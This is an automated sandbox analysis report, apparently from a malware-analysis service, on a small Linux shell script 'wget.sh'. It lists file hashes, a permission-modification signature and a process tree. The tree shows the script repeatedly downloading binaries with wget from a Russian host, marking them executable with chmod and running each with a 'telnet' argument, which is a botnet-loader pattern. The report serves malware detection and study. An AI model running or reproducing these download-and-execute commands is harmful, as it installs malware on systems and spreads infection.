Analysis
-
max time kernel
0s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-12-2024 13:17
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
676B
-
MD5
5b3ceaec7a3ad11b45f5fca1b603d939
-
SHA1
5e5ee3fa232288f77e670c66d8ca42c0cc171e45
-
SHA256
bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
-
SHA512
47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1551 chmod 1554 chmod 1560 chmod 1566 chmod 1515 chmod 1524 chmod 1539 chmod 1518 chmod 1530 chmod 1545 chmod
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵PID:1510
-
/usr/bin/wgetwget http://stop.eye-network.ru/wkb862⤵PID:1511
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/wkb86./wkb86 telnet2⤵PID:1516
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/kqibeps2⤵PID:1517
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/kqibeps./kqibeps telnet2⤵PID:1519
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/bojwsl2⤵PID:1520
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/bojwsl./bojwsl telnet2⤵PID:1528
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/njvwa42⤵PID:1529
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/njvwa4./njvwa4 telnet2⤵PID:1534
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/ngwa52⤵PID:1535
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/ngwa5./ngwa5 telnet2⤵PID:1540
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/woega62⤵PID:1541
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/woega6./woega6 telnet2⤵PID:1546
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/fnkea72⤵PID:1547
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/fnkea7./fnkea7 telnet2⤵PID:1552
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/gnjqwpc2⤵PID:1553
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/gnjqwpc./gnjqwpc telnet2⤵PID:1555
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wlw68k2⤵PID:1556
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/wlw68k./wlw68k telnet2⤵PID:1564
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wrjkngh42⤵PID:1565
-
-
/bin/chmodchmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/wrjkngh4./wrjkngh4 telnet2⤵PID:1570
-